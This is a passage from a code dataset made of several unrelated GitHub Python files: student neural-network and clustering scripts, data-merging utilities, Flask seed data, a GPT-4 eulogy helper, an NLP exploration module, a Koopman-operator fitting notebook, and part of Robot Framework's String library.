input_size))\n \n self.b = np.random.uniform(-0.1,0.1,(output_size, 1))\n\n \n self.y = np.zeros((output_size, 1))\n def forward(self, x):\n self.x = x\n self.y = self.activator.forward(\n np.dot(self.W, x) + self.b)\n \n def backward(self, delta_array):\n '''\n Your task 1\n - calculate the Gradient in Eq.1\n - (refer to the 2nd term in Eq.1)\n '''\n \n # ****** Your code begin (task 1) ******\n # self.W_grad = the dot product of delta_array and the transpose of self.x\n self.W_grad = np.dot(delta_array,self.x.T)\n self.b_grad = delta_array\n # ****** Your code end (task 1) ******\n \n # Don't touch other code\n self.delta = self.activator.backward(self.x) * np.dot(\n self.W.T, delta_array)\n def update(self, learning_rate):\n # Eq.1 in Sec. 2.4\n self.W += learning_rate * self.W_grad\n self.b += learning_rate * self.b_grad\n\n\nclass Network():\n def __init__(self, input_size,output_size):\n self.layer =FullConnectedLayer(\n input_size, output_size,\n tanhActivator()\n )\n def __str__(self):\n np.set_printoptions(threshold=np.inf)\n result = ''\n for i in range(len(self.layers)):\n result +='W{1} = np.{0}'.format(repr(self.layers[i].W),i+1) + '\\n\\n' \n \n for i in range(len(self.layers)):\n result +='b{1} = np.{0}'.format(repr(self.layers[i].b),i+1) + '\\n\\n' \n \n def forward(self, x):\n self.layer.forward(x)\n y = self.layer.y\n return y\n \n def train(self, X, Y, epoch=100,learning_rate=0.01):\n for i in range(epoch):\n success_case = 0\n if epoch == 400:\n learning_rate /=10\n if epoch == 800:\n learning_rate /= 10\n for d in range(len(X)):\n y = self.train_one_sample(X[d], \n Y[d], learning_rate)\n if np.argmax(y) == np.argmax(Y[d]):\n success_case+=1\n\n if (i%5 ==0):\n success_case_val = 0\n for d in range(len(val_X)):\n #calssify the image is c if the output >=0.5\n if np.argmax(val_Y[d]) == np.argmax(model.forward(val_X[d])):\n success_case_val += 1\n accuracy_val = success_case_val/len(val_X)*100\n print('accuarcy in validation dataset is %.2f %%'%accuracy_val)\n \n accuracy = success_case/len(X)*100\n print('epoch %d:'%i,end='')\n print('accuracy in training is %.2f %%'%accuracy)\n if accuracy >= 100-1e-5:\n break\n \n def train_one_sample(self, x, y, learning_rate):\n output = self.forward(x)\n self.calc_gradient(y)\n self.update_weight(learning_rate)\n return output\n def calc_gradient(self, label):\n delta = self.layer.activator.backward(\n self.layer.y\n ) * (label - self.layer.y)\n self.layer.backward(delta)\n def update_weight(self, learning_rate):\n self.layer.update(learning_rate)\n\ndef data_processing():\n \n X,Y = load_data()\n train_X,train_Y = X[:1000],Y[:1000]\n val_X,val_Y = X[1000:1200],Y[1000:1200]\n train_X = train_X.reshape((*train_X.shape,1))\n train_Y = train_Y.reshape((*train_Y.shape,1))\n val_X = val_X.reshape((*val_X.shape,1))\n val_Y = val_Y.reshape((*val_Y.shape,1))\n #amount_of_c_in_train = train_Y.sum()\n #amount_of_c_in_val =val_Y.sum()\n #print('amount_of_c_in_train=%d'%amount_of_c_in_train)\n #print('amount_of_c_in_val=%d'%amount_of_c_in_val)\n return train_X,train_Y,val_X,val_Y\n\nif __name__ == '__main__':\n train_X,train_Y,val_X,val_Y = data_processing()\n model = Network(train_X.shape[1],train_Y.shape[1])\n \n #training\n epochs = 1000\n learning_rate = 0.01\n model.train(train_X,train_Y,epochs,learning_rate)\n #validation\n success_case = 0\n for i in range(len(val_X)):\n #calssify the image is c if the output >=0.5\n if np.argmax(val_Y[i]) == np.argmax(model.forward(val_X[i])):\n success_case += 1\n accuracy = success_case/len(val_X)*100\n print('accuarcy in validation dataset is %.2f %%'%accuracy)\n \n\n","repo_name":"0xyk/CISC7201-2021Autumn-University-of-Macau","sub_path":"Mini-Project 02_Handwriting-Recognition_NN/section2_1layerNN.py","file_name":"section2_1layerNN.py","file_ext":"py","file_size_in_byte":6001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8482240291","text":"from sklearn.cluster import SpectralClustering\nfrom sklearn.datasets._samples_generator import make_blobs\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets import make_circles\nimport sklearn.cluster as skl_cluster\nimport numpy as np\nnp.set_printoptions(precision=3)\nn = 10\nk = 3\nd = 2\nnp.random.seed(1)\n# X, _ = make_blobs(n_samples=400, centers=4, cluster_std=1)\n# print(X[0][0])\n# plt.scatter(X[:, 0], X[:, 1])\n# plt.show()\n#\n# sc = SpectralClustering(n_clusters=4, n_init=1).fit(X)\n# print(len(sc.labels_))\n# labels = sc.labels_\n# plt.scatter(X[:, 0], X[:, 1], c=labels)\n# plt.show()\n# f = plt.figure()\n# f.add_subplot(2, 2, 1)\n# for i in range(2, 6):\n# sc = SpectralClustering(n_clusters=i).fit(X)\n# f.add_subplot(2, 2, i - 1)\n# plt.scatter(X[:, 0], X[:, 1], s=5, c=sc.labels_, label=\"n_cluster-\" + str(i))\n# plt.legend()\n# plt.show()\n# X, y = make_blobs(n_samples=10, centers=3, n_features=2, random_state=0)\n# print(X)\n# print(y)\n# X, y = make_blobs(n_samples=[3, 3, 4], centers=None, n_features=2, random_state=0)\n# print(X)\n# print(y)\n# fist\n# X, _ = make_blobs(n_samples=n, centers=k, n_features=d, shuffle=True, random_state=31)\n# with open(\"input_1.txt\", mode=\"w\", encoding = 'utf-8') as f:\n# for dp in X:\n# for i in range(d):\n# f.write(f\"{dp[i]:.3f}\")\n# if i != d - 1:\n# f.write(\",\")\n# f.write(\"\\n\")\ncircles, circles_clusters = make_circles(n_samples=400, noise=.01, random_state=0)\n\n# cluster with kmeans\nKmean = skl_cluster.KMeans(n_clusters=2)\nKmean.fit(circles)\nclusters = Kmean.predict(circles)\n\n# plot the data, colouring it by cluster\nplt.scatter(circles[:, 0], circles[:, 1], s=15, linewidth=0.1, c=clusters,cmap='flag')\nplt.show()\n\n# cluster with spectral clustering\nmodel = skl_cluster.SpectralClustering(n_clusters=2, affinity='nearest_neighbors', assign_labels='kmeans')\nlabels = model.fit_predict(circles)\nplt.scatter(circles[:, 0], circles[:, 1], s=15, linewidth=0, c=labels, cmap='flag')\nplt.show()\n\n\n\n","repo_name":"ram-elgov/NSC_Normalized_Spectral_Clustering_C_API","sub_path":"src/sklearn_nsc.py","file_name":"sklearn_nsc.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"32593441883","text":"import pandas as pd\r\nimport numpy as np\r\nimport os\r\n\r\nimport tqdm\r\n\r\n\r\ndef merge_au_txt(au_names_list, root_au_path, save_path,logits=False):\r\n aulist = [1, 2, 4, 6, 7, 10, 12, 15, 23, 24, 25, 26]\r\n for au_name in tqdm.tqdm(au_names_list):\r\n for au_txts in os.listdir(os.path.join(root_au_path, au_name)):\r\n count = []\r\n for i in au_names_list:\r\n data = pd.read_csv(os.path.join(root_au_path, i, au_txts))\r\n label = data.loc[:, [i.split('-')[0].upper()]].values\r\n if len(count) == 0:\r\n count = label\r\n else:\r\n count = np.concatenate((count, label), axis=1)\r\n df = pd.DataFrame(count.tolist(), columns=[\"AU\" + str(j) for j in aulist])\r\n if logits:\r\n if not os.path.exists(os.path.join(save_path, 'val_merge_logits_txt')):\r\n os.makedirs(os.path.join(save_path, 'val_merge_logits_txt'))\r\n df.to_csv(os.path.join(save_path, 'val_merge_logits_txt', f'{au_txts}'), index=None)\r\n else:\r\n if not os.path.exists(os.path.join(save_path, 'val_merge_txt')):\r\n os.makedirs(os.path.join(save_path, 'val_merge_txt'))\r\n df.to_csv(os.path.join(save_path, 'val_merge_txt', f'{au_txts}'), index=None)\r\n\r\n\r\nif __name__ == '__main__':\r\n au_names_list = ['AU1',\r\n 'AU2',\r\n 'AU4',\r\n 'AU6',\r\n 'AU7',\r\n 'AU10',\r\n 'AU12',\r\n 'AU15',\r\n 'AU23',\r\n 'AU24',\r\n 'AU25',\r\n 'AU26',\r\n ]\r\n # merge_au_txt(au_names_list,\r\n # '/root/autodl-tmp/qfs/ABAW_Competition_0324/0324_val_result/abaw_situ_data_our_label_smooth_result/val_result/',\r\n # '/root/autodl-tmp/qfs/ABAW_Competition_0324/0324_val_result/abaw_situ_data_our_label_smooth_result/',\r\n # False)\r\n merge_au_txt(au_names_list,\r\n '/root/autodl-tmp/qfs/ABAW_Competition_0324/0324_val_result/submit_res100/val_logits_result/',\r\n '/root/autodl-tmp/qfs/ABAW_Competition_0324/0324_val_result/submit_res100/',\r\n True)\r\n merge_au_txt(au_names_list,\r\n '/root/autodl-tmp/qfs/ABAW_Competition_0324/0324_val_result/submit_res100/val_result/',\r\n '/root/autodl-tmp/qfs/ABAW_Competition_0324/0324_val_result/submit_res100/',\r\n False)\r\n","repo_name":"situAI/ABAW2022_AU_SituTech","sub_path":"ensemble/merge_model_au_txt.py","file_name":"merge_model_au_txt.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73766520054","text":"from app.models import db, Todo, environment, SCHEMA\n\ndef seed_todo():\n todo1 = Todo(\n writer_id=1,\n title='Todo 1',\n description='denist at 5 PM'\n )\n todo2 = Todo(\n writer_id=1,\n title='Todo 2',\n description='denist at 5 PM'\n )\n todo3 = Todo(\n writer_id=1,\n title='Todo 3',\n description='go to new york to visit the city once more!'\n )\n todo4 = Todo(\n writer_id=1,\n title='Todo 4',\n description='buy plane tickets back to Cali'\n )\n todo5 = Todo(\n writer_id=1,\n title='Todo 5',\n description='pick up medicine from CVS/Target'\n )\n todo6 = Todo(\n writer_id=1,\n title='Todo 6', \n description='go to costco for groceries'\n\n )\n todo7 = Todo(\n writer_id=1,\n title='Todo 7',\n description='clean room before end of the week'\n )\n todo8 = Todo(\n writer_id=1,\n title='Todo 8',\n description='finish homework and then playing val'\n )\n todo9 = Todo(\n writer_id=1,\n title='Todo 9',\n description='doing laundry and cooking dinner before 6PM'\n )\n todo10 = Todo(\n writer_id=1,\n title='Todo 10',\n # description='business working meeting at 12:30PM'\n )\n db.session.add_all([todo1, todo2, todo3, todo4, todo5,\n todo6, todo7, todo8, todo9, todo10])\n db.session.commit()\n\n\n\n\n\ndef undo_todo():\n\n if environment == \"production\":\n db.session.execute(\n f\"TRUNCATE table {SCHEMA}.todos RESTART IDENTITY CASCADE;\")\n else:\n db.session.execute(\"DELETE FROM todos\")\n\n db.session.commit()","repo_name":"evnxprk/sanri0-note","sub_path":"app/seeds/todo.py","file_name":"todo.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43978390753","text":"import openai\nimport main,db\n\nwith open('secret.env', 'r') as file:\n openai.api_key = file.read()\nprint(openai.api_key)\n\ndef fourComplete(prompt,temp=0.8):\n completion = openai.ChatCompletion.create(\n model=\"gpt-4\",\n messages=[\n {\"role\": \"system\", \"content\": \"You are a wholesome World of Warcraft helper bot.\"},\n {\"role\": \"user\", \"content\": prompt}\n ],\n temperature=temp,\n request_timeout=120\n )\n return completion.choices[0].message.content\n \ndef eulogize(name):\n if db.check_for_character(name) == None:\n response = fourComplete(\"Write a humorous error message explaining that you couldn't find a character named: \"+name)\n else:\n data = main.fetch_euology_data(name)\n response = fourComplete(f\"Write a one paragraph eulogy for {data['name']}, a {data['race']} {data['spec']} {data['class']}, who resided in {data['realm']}. (use {data['gender'].lower()} pronouns)\")\n return response","repo_name":"NoahHummus/wow-ilvl-bot","sub_path":"chatgptPy.py","file_name":"chatgptPy.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40129993364","text":"\r\n\r\na=2\r\nb=1\r\ns=0\r\nfor i in range(0,20):\r\n\ts+=a/b\r\n\tt=a\r\n\ta=a+b\r\n\tb=t\r\nprint (s)\r\n\r\n\r\n\r\n#!/usr/bin/python\r\n# -*- coding: UTF-8 -*-\r\n\r\ns=0\r\ndef fact(n):\r\n\tif n==1:\r\n\t\treturn 1\r\n\treturn n*fact(n-1)\r\n\r\nfor n in range(1,3):\r\n a=fact(n)\r\n s+=a\r\nprint(\"结果是:\",s)\r\n\r\n\r\n\r\n\r\ndef Factorial(n):\r\n if n == 1:\r\n fn=1\r\n else:\r\n fn = n*Factorial(n-1)\r\n return fn\r\nprint(\"Factorial(5)=\",Factorial(5))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"zhouli01/python_test01","sub_path":"sum_fen.py","file_name":"sum_fen.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8776168438","text":"import os\nimport json\nfrom typing import Dict, List, Optional, Union, cast\nimport requests\nimport re\nimport unicodedata\nimport pandas as pd\n\nfrom bs4 import BeautifulSoup\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport json\n# import acquire\nimport prepare\nimport wrangle as w\n\nfrom env import github_token, github_username\nimport nltk\nfrom nltk.tokenize.toktok import ToktokTokenizer\nfrom nltk.corpus import stopwords\n\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\n\ndf=pd.read_json('data2.json')\n\n#Question 1\ndef viz_most_common_unigrams(words):\n '''takes in words, get top 5 unigram words, plot bar graph of top 5 unigram words'''\n \n words_unigrams = pd.Series(nltk.ngrams(words.split(), 1))\n top_5_words = words_unigrams.value_counts().head(5)\n ax = top_5_words.sort_values().plot.barh(color='pink', width=.9, figsize=(10, 6))\n\n plt.title('5 Most frequently occuring words unigrams')\n plt.ylabel('unigram')\n plt.xlabel('# Occurances')\n ax.spines[['right', 'top']].set_visible(False)\n\n\n # make the labels pretty\n ticks, _ = plt.yticks()\n labels = top_5_words.sort_values().reset_index()['index'].apply(lambda t: t[0])\n _ = plt.yticks(ticks, labels)\n \n\ndef viz_most_common_bigrams(words):\n '''takes in words, get top 5 bigram words, plot bar graph of top 5 bigram words'''\n \n words_bigrams = pd.Series(nltk.ngrams(words.split(), 2))\n top_5_words = words_bigrams.value_counts().head(5)\n ax = top_5_words.sort_values().plot.barh(color='pink', width=.9, figsize=(10, 6))\n\n plt.title('5 Most frequently occuring words bigrams')\n plt.ylabel('Bigram')\n plt.xlabel('# Occurances')\n ax.spines[['right', 'top']].set_visible(False)\n\n # make the labels pretty\n ticks, _ = plt.yticks()\n labels = top_5_words.sort_values().reset_index()['index'].apply(lambda t: t[0] + ' ' + t[1])\n _ = plt.yticks(ticks, labels)\n \ndef viz_most_common_trigrams(words):\n '''takes in words, get top 5 trigram words, plot bar graph of top 5 bigram words'''\n \n words_trigrams = pd.Series(nltk.ngrams(words.split(), 3))\n top_5_words = words_trigrams.value_counts().head(5)\n ax = top_5_words.sort_values().plot.barh(color='pink', width=.9, figsize=(10, 6))\n\n plt.title('5 Most frequently occuring words trigrams')\n plt.ylabel('Trigram')\n plt.xlabel('# Occurances')\n ax.spines[['right', 'top']].set_visible(False)\n\n\n # make the labels pretty\n ticks, _ = plt.yticks()\n labels = top_5_words.sort_values().reset_index()['index'].apply(lambda t: t[0] + ' ' + t[1] + ' ' + t[2])\n _ = plt.yticks(ticks, labels)\n\ndef Q1(train):\n words = w.clean_text(' '.join(train['readme_contents_clean']))\n viz_most_common_unigrams(words)\n plt.show()\n viz_most_common_bigrams(words)\n plt.show()\n viz_most_common_trigrams(words)\n plt.show()\n \n \n#Question 2 \ndef viz_length_content(train):\n '''takes in a dataframe, plot a bar graph of a lenth of content by programming language'''\n \n ax = sns.barplot(data=train, x='length',y='language', orient='h' ,order=['JavaScript', 'Java', 'Python', 'C++'])\n avg_length = train.length.mean()\n plt.axvline(avg_length , label=\"Avg Length\", color='purple')\n plt.legend()\n ax.legend(loc='upper left', bbox_to_anchor=(1, 1))\n plt.ylabel('Programming Language')\n plt.xlabel('Length')\n plt.xlim(0,12000)\n plt.title('Variation of length of README by programming language')\n ax.spines[['right', 'top']].set_visible(False)\n plt.show()\n\n#Question 3 \ndef viz_count_unique(train):\n '''takes in a dataframe, plot a bar graph of a number of unique words of content by programming language'''\n\n \n ax = sns.barplot(data=train, x='unique',y='language' ,orient='h', order=[ 'Java','Python','JavaScript','C++'])\n plt.ylabel('Programming Language')\n plt.xlabel('Length')\n# plt.xlim(30,40)\n plt.title('Variation of number of unique words by programming language')\n ax.spines[['right', 'top']].set_visible(False)\n plt.show()\n\n\n","repo_name":"JDSINLP/NLP-Project","sub_path":"explore.py","file_name":"explore.py","file_ext":"py","file_size_in_byte":4092,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"31293918942","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom matplotlib import pyplot as plt\nimport matplotlib\nfrom sklearn import preprocessing\nimport os\nimport numpy as np\nimport random as rd\nimport tensorflow as tf \ntf.compat.v1.disable_eager_execution()\nsess = tf.compat.v1.InteractiveSession()\nfrom scipy.integrate import odeint\nimport pickle\nfrom sklearn.preprocessing import StandardScaler\nfrom scipy.signal import savgol_filter\nimport scipy\nimport joblib\n\n\n# In[2]:\n\n\ndef model(x):\n a11, a12, a21, a22, gamma = np.array([0.7, 0, 0.8, 0.9, 0.6])\n x_f1 = a11*x[0] + a12*x[1]\n x_f2 = a21*x[0] + a22*x[1] + gamma*x[0]**2\n return [x_f1, x_f2]\n\n\n# In[3]:\n\n\nICs = []\nnum_ics = 50\nfor i in range(0, num_ics):\n r = rd.uniform(30, 40)\n theta = rd.uniform(0, 0.5*3.14)\n ICs.append([r*np.cos(theta), r*np.sin(theta)])\n \nfor i in range(0, num_ics):\n plt.scatter(ICs[i][0],ICs[i][1])\n\n\n# In[4]:\n\n\nT = 100\nt = np.linspace(0, T, T+1)\nfig, (ax1, ax2) = plt.subplots(1, 2, figsize=(15,10))\nfig.suptitle('Horizontally stacked subplots')\nfor ic in ICs:\n x = np.array([ic[0], ic[1]])\n sol = []\n for i in range(0, T+1):\n y = model(x)\n x = y\n sol.append(x)\n Xp_data = sol[0:-1]\n Xf_data = sol[1:]\n ax1.plot(t, np.array(sol).T[0])\n ax2.plot(t, np.array(sol).T[1])\n\n\n# In[5]:\n\n\nXp=tf.compat.v1.placeholder(tf.compat.v1.double, shape = (2, len(Xp_data)))\n\nXf=tf.compat.v1.placeholder(tf.compat.v1.double, shape = (2, len(Xp_data)))\n\n#n = tf.compat.v1.Variable(np.random.randn(), name = 'n', dtype = tf.double)\n#n1 = tf.compat.v1.get_variable('n1',\n# dtype=tf.double,\n# shape=(),\n# initializer=tf.random_uniform_initializer(minval=1., maxval=10.),\n# constraint=lambda z: tf.clip_by_value(z, 1, 10))\n\nn1 = tf.Variable(tf.compat.v1.truncated_normal((1, ), mean=1.5,stddev=0.3,dtype=tf.double))\n\n#n1 = tf.Variable(1.0, dtype = tf.double)\n\nKx = tf.Variable(tf.compat.v1.truncated_normal((3, 3), mean=0.0,stddev=0.1,dtype=tf.double));\n#np.abs(Y - W*b)\n\n\n#last_col = tf.constant(np.zeros(shape=(3, 1)), dtype=tf.dtypes.double)\n\n#last_col = tf.concat([last_col, [[1.]]], axis=0)\n\n#Kx = tf.concat([Kx, last_col], axis=1) \n#print(Kx)\n\n\n\n# In[6]:\n\n\nR2 = (1 - tf.divide(tf.math.reduce_sum(tf.math.square(tf.concat([Xf, [Xf[0]**n1]], axis = 0) - tf.math.reduce_mean(tf.concat([Xf, [Xf[0]**n1]], axis = 0), axis=0))), tf.math.reduce_sum(tf.math.square(tf.concat([Xf, [Xf[0]**n1]], axis = 0) - tf.matmul(Kx, tf.concat([Xf, [Xf[0]**n1]], axis = 0)))))) * 100\n\n\n# In[7]:\n\n\nsess = tf.compat.v1.InteractiveSession();\nsess.run(tf.compat.v1.global_variables_initializer());\n\n\n# In[8]:\n\n\ncost = tf.reduce_sum(tf.pow(tf.concat([Xf, [Xf[0]**n1]], axis = 0) - tf.matmul(Kx, tf.concat([Xp, [Xp[0]**n1]], axis = 0)), 2))/len(Xp_data)\n\nfwd_pred = tf.concat([Xp, [Xp[0]**tf.math.ceil(n1)]], axis = 0)\nfwd_pred_first = Xp[0][0]**tf.math.ceil(n1)\n\n\n# In[9]:\n\n\ninit = tf.compat.v1.global_variables_initializer()\nwith tf.compat.v1.Session() as sesh: \n # Initializing the Variables\n sesh.run(init) \n print(\"Initial n1\", sesh.run(R2, feed_dict = {Xp: np.array(Xp_data).T, Xf: np.array(Xf_data).T}))\n # Iterating through all the epochs\n\n\n# In[11]:\n\n\ntraining_epochs = 85000\nlearning_rate = 0.00005\nerror_threshold = 0.000000001\noptimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate, beta1=0.9, beta2=0.99, epsilon=1e-08, use_locking=False, name='Adam').minimize(cost)\ninit = tf.compat.v1.global_variables_initializer()\nc = 100\nepoch = 0\nwith tf.compat.v1.Session() as sesh: \n sesh.run(init) \n print(\"Initial n1\", sesh.run(n1))\n while epoch < training_epochs and c > error_threshold:\n c = sesh.run(cost, feed_dict = {Xp: np.array(Xp_data).T, Xf: np.array(Xf_data).T})\n if epoch % 5000 == 0:\n print(\"Epoch:\", epoch, \"{:.5f}\".format(c))\n print(\"Exponent\", sesh.run(n1))\n print(\"R2\", sesh.run(R2, feed_dict = {Xp: np.array(Xp_data).T, Xf: np.array(Xf_data).T}))\n sesh.run(optimizer, feed_dict = {Xp: np.array(Xp_data).T, Xf: np.array(Xf_data).T})\n epoch+=1\n KxT_num = sesh.run(Kx)\n #sesh.close()\n print(sesh.run(n1))\n print(sesh.run(cost, feed_dict = {Xp: np.array(Xp_data).T, Xf: np.array(Xf_data).T}))\n\n\n# ## Discrete model\n\n# In[ ]:\n\n\nmodel_name = 'CFS_data'\n\n\n# In[ ]:\n\n\nscaler = StandardScaler().fit(Xp)\nXp_ref_scaled = np.array(Xp)#scaler.transform(Xp)\nXf_ref_scaled = np.array(Xf)#scaler.transform(Xf)\n\nfig, (ax1, ax2) = plt.subplots(1, 2, figsize=(15,10))\n\nax1.scatter(np.linspace(0, len(Xp_ref_scaled[:, 0]), len(Xp_ref_scaled[:, 0])), Xp_ref_scaled[:, 0], color = 'r')\nax1.scatter(np.linspace(1, len(Xf_ref_scaled[:, 0])+1, len(Xf_ref_scaled[:, 0])), Xf_ref_scaled[:, 0], color = 'b')\n\nax1.set_xlim([-2, 22])\nax1.set_ylim([-5, 5])\n\nax2.scatter(np.linspace(0, len(Xp_ref_scaled[:, 1]), len(Xp_ref_scaled[:, 1])), Xp_ref_scaled[:, 1], color = 'r')\nax2.scatter(np.linspace(1, len(Xf_ref_scaled[:, 1])+1, len(Xf_ref_scaled[:, 1])), Xf_ref_scaled[:, 1], color = 'b')\n\n#ax2.set_xlim([-2, 22])\n#ax2.set_ylim([-5, 5])\n\n\n# scaler_filename = \"CFS_scaler.save\"\n# joblib.dump(scaler, scaler_filename) \n\n# In[ ]:\n\n\nPsiXp = np.vstack([Xp_ref_scaled.T, Xp_ref_scaled.T[0]**2.0])\nPsiXf = np.vstack([Xf_ref_scaled.T, Xf_ref_scaled.T[0]**2.0])\n\n\n# In[ ]:\n\n\nKx = np.matmul(PsiXf, np.matmul(PsiXp.T, np.linalg.inv(np.matmul(PsiXp, PsiXp.T))))\n\n\n# In[ ]:\n\n\nKx\n\n\n# In[ ]:\n\n\nnp.sum((PsiXf - np.matmul(Kx, PsiXp))**2)\n\n\n# In[ ]:\n\n\nimport joblib\n\nscaler_filename = 'CFS_scaler.save'\nscaler = joblib.load(scaler_filename) \n\nP = np.diag(scaler.scale_)\nb = scaler.mean_\n\nK11 = np.array([[0.7, 0], [0.8, 0.9]])\nK12 = np.array([[0], [0.6]])\nK21 = np.array([[0, 0]])\nK22 = np.array([[0.49]])\n\nKs11 = np.matmul(np.matmul(P, K11), np.linalg.inv(P))\nKs12 = np.matmul(P, K12)\nKs13 = np.matmul(np.eye(2) - Ks11, b)\nKs21 = np.matmul(K21, np.linalg.inv(P))\nKs22 = K22\nKs23 = np.matmul(Ks21, b)\n\nKs1 = np.concatenate([Ks11, Ks12, Ks13.reshape(-1, 1)], axis = 1)\nKs2 = np.concatenate([Ks21, Ks22, Ks23.reshape(-1, 1)], axis = 1)\nKs = np.concatenate([Ks1, Ks2, np.array([[0, 0, 0, 1]])], axis = 0)\n\nKs\n\n\n# In[13]:\n\n\nXp_final_learned = []\nXf_final_learned = []\nXp_final_actual = []\nXf_final_actual = []\n#t = np.array([i for i in range(0, N+1)])\nx_learned = np.zeros(2)\nx_actual = np.zeros(2)\nfig, (ax1, ax2) = plt.subplots(1, 2, figsize=(15,10))\n#fig.suptitle('Horizontally stacked subplots')\nT = 100\nt = np.linspace(0, T, T+1)\n\nfor ic in ICs:\n #ic_s = scaler.transform(np.array([ic]))\n x_learned = np.array(ic)\n x_actual[0] = ic[0]\n x_actual[1] = ic[1]\n X_learned = []\n #print(\"x_actual\", x_actual)\n #print(\"x_learned\", x_learned)\n X_actual = []\n X_learned.append([x_learned[0], x_learned[1]]) ## ICs\n X_actual.append(np.array([x_actual[0], x_actual[1]])) \n for k in range(0, T):\n y_learned = np.matmul(KxT_num, np.vstack([x_learned[0], x_learned[1], x_learned[0]**2]))[0:2].T[0]\n x_learned = y_learned#np.array([[y_learned[0], y_learned[1]]])\n X_learned.append([x_learned[0], x_learned[1]]) \n y_actual = model(x_actual)\n x_actual = y_actual\n X_actual.append(x_actual)\n ax1.scatter(t, np.array(X_actual).T[0])\n ax1.plot(t, np.array(X_learned).T[0])\n ax2.scatter(t, np.array(X_actual).T[1])\n ax2.plot(t, np.array(X_learned).T[1])\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"dmj6288/TunnelDMD","sub_path":"Data_Generation_CFS_control.py","file_name":"Data_Generation_CFS_control.py","file_ext":"py","file_size_in_byte":7404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13515055352","text":"import os\nimport re\nfrom fnmatch import fnmatchcase\nfrom random import randint\nfrom string import ascii_lowercase, ascii_uppercase, digits\n\nfrom robot.api import logger\nfrom robot.api.deco import keyword\nfrom robot.utils import (FileReader, is_bytes, is_string, is_truthy,\n parse_re_flags, safe_str, type_name)\nfrom robot.version import get_version\n\n\nclass String:\n \"\"\"A library for string manipulation and verification.\n\n ``String`` is Robot Framework's standard library for manipulating\n strings (e.g. `Replace String Using Regexp`, `Split To Lines`) and\n verifying their contents (e.g. `Should Be String`).\n\n Following keywords from ``BuiltIn`` library can also be used with strings:\n\n - `Catenate`\n - `Get Length`\n - `Length Should Be`\n - `Should (Not) Be Empty`\n - `Should (Not) Be Equal (As Strings/Integers/Numbers)`\n - `Should (Not) Match (Regexp)`\n - `Should (Not) Contain`\n - `Should (Not) Start With`\n - `Should (Not) End With`\n - `Convert To String`\n - `Convert To Bytes`\n \"\"\"\n ROBOT_LIBRARY_SCOPE = 'GLOBAL'\n ROBOT_LIBRARY_VERSION = get_version()\n\n def convert_to_lower_case(self, string):\n \"\"\"Converts string to lower case.\n\n Uses Python's standard\n [https://docs.python.org/library/stdtypes.html#str.lower|lower()]\n method.\n\n Examples:\n | ${str1} = | Convert To Lower Case | ABC |\n | ${str2} = | Convert To Lower Case | 1A2c3D |\n | Should Be Equal | ${str1} | abc |\n | Should Be Equal | ${str2} | 1a2c3d |\n \"\"\"\n return string.lower()\n\n def convert_to_upper_case(self, string):\n \"\"\"Converts string to upper case.\n\n Uses Python's standard\n [https://docs.python.org/library/stdtypes.html#str.upper|upper()]\n method.\n\n Examples:\n | ${str1} = | Convert To Upper Case | abc |\n | ${str2} = | Convert To Upper Case | 1a2C3d |\n | Should Be Equal | ${str1} | ABC |\n | Should Be Equal | ${str2} | 1A2C3D |\n \"\"\"\n return string.upper()\n\n @keyword(types=None)\n def convert_to_title_case(self, string, exclude=None):\n \"\"\"Converts string to title case.\n\n Uses the following algorithm:\n\n - Split the string to words from whitespace characters (spaces,\n newlines, etc.).\n - Exclude words that are not all lower case. This preserves,\n for example, \"OK\" and \"iPhone\".\n - Exclude also words listed in the optional ``exclude`` argument.\n - Title case the first alphabetical character of each word that has\n not been excluded.\n - Join all words together so that original whitespace is preserved.\n\n Explicitly excluded words can be given as a list or as a string with\n words separated by a comma and an optional space. Excluded words are\n actually considered to be regular expression patterns, so it is\n possible to use something like \"example[.!?]?\" to match the word\n \"example\" on it own and also if followed by \".\", \"!\" or \"?\".\n See `BuiltIn.Should Match Regexp` for more information about Python\n regular expression syntax in general and how to use it in Robot\n Framework data in particular.\n\n Examples:\n | ${str1} = | Convert To Title Case | hello, world! |\n | ${str2} = | Convert To Title Case | it's an OK iPhone | exclude=a, an, the |\n | ${str3} = | Convert To Title Case | distance is 1 km. | exclude=is, km.? |\n | Should Be Equal | ${str1} | Hello, World! |\n | Should Be Equal | ${str2} | It's an OK iPhone |\n | Should Be Equal | ${str3} | Distance is 1 km. |\n\n The reason this keyword does not use Python's standard\n [https://docs.python.org/library/stdtypes.html#str.title|title()]\n method is that it can yield undesired results, for example, if\n strings contain upper case letters or special characters like\n apostrophes. It would, for example, convert \"it's an OK iPhone\"\n to \"It'S An Ok Iphone\".\n\n New in Robot Framework 3.2.\n \"\"\"\n if not is_string(string):\n raise TypeError('This keyword works only with Unicode strings.')\n if is_string(exclude):\n exclude = [e.strip() for e in exclude.split(',')]\n elif not exclude:\n exclude = []\n exclude = [re.compile('^%s$' % e) for e in exclude]\n\n def title(word):\n if any(e.match(word) for e in exclude) or not word.islower():\n return word\n for index, char in enumerate(word):\n if char.isalpha():\n return word[:index] + word[index].title() + word[index+1:]\n return word\n\n tokens = re.split(r'(\\s+)', string, flags=re.UNICODE)\n return 